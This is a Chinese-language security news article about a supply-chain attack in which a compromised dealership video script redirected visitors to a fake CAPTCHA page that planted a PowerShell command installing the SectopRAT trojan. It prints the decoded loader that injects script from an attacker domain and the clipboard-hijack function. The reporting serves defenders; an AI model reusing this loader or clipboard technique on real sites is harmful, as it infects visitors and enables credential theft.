摘要:此次攻击利用了汽车经销商专门使用的共享视频服务,注入恶意代码,将毫无戒心的用户重定向到欺诈性网页,旨在在其系统上安装危险的 SectopRAT 远程访问木马。
恶意软件
一次复杂的供应链攻击已经危及全国 100 多家汽车经销店,无数访客面临恶意软件感染的风险。
此次攻击利用了汽车经销商专门使用的共享视频服务,注入恶意代码,将毫无戒心的用户重定向到欺诈性网页,旨在在其系统上安装危险的 SectopRAT 远程访问木马。
最初的入侵并非发生在经销商自己的网站上,而是通过汽车行业常用的第三方视频服务发生。
受影响经销商网站的访问者在不知不觉中接触到了恶意 JavaScript,这些恶意 JavaScript 可能会将访问者重定向到诱骗页面并促使其进行交互。
安全研究员 Randy McEoin发现,攻击媒介源自托管在“idostream.com”上的受感染脚本,“idostream.com”是一家总部位于康涅狄格州曼彻斯特的流媒体服务提供商,服务于汽车行业。
具体被感染的文件被标识为“les_video_srp.js”,其中包含用于加载其他恶意内容的混淆代码。
当攻击被触发时,它会向访问者展示一个虚假的 CAPTCHA 验证页面,声称要验证“我不是机器人”。
单击复选框后,用户将被指示执行在不知情的情况下在其计算机上执行恶意代码的操作。
该网页巧妙地操纵了用户的剪贴板,插入了一个恶意的PowerShell命令,该命令在粘贴到 Windows 运行中时就会执行。
此次攻击显示出其社会工程方法的复杂性,让受害者相信他们只是在完成标准验证过程,而实际上他们正在安装危险的恶意软件。
感染链
感染始于混淆的 JavaScript,解码后显示一个简单的脚本,该脚本会在网页中插入额外的代码:
var a = document.createElement('script')a.src = 'https://security-confirmation.help/captchav2'document.getElementsByTagName('head')[0].appendChild(a)该脚本将用户重定向到托管在“deliveryoka.com”上的 ClickFix 网页,该网页包含一个隐藏的 JavaScript 函数,旨在将恶意代码放入用户的剪贴板:
function setClipboardCopyData(textToCopy) {const decodedText = textToCopy.replace(/'/g, "'").replace(/"/g, "\"");const tempTextArea = document.createElement("textarea");tempTextArea.value = decodedText;document.body.append(tempTextArea);tempTextArea.select;document.execCommand("copy");document.body.removeChild(tempTextArea);}执行时,PowerShell 命令会下载一个包含 SectopRAT 恶意软件的 ZIP 文件 (Lancaster.zip),该文件为攻击者提供对受感染系统的远程访问权限,可能导致凭证盗窃和数据泄露。
对该恶意软件的分析得出了 10/10 的威胁评分,证实了其严重性。据报道,第三方服务 LES Automotive 已修复该问题,但受影响的程度和用户数量仍不清楚。
网罗圈内热点 专注网络安全
支持「安全圈」就点个三连吧!
来源:汽车小管家
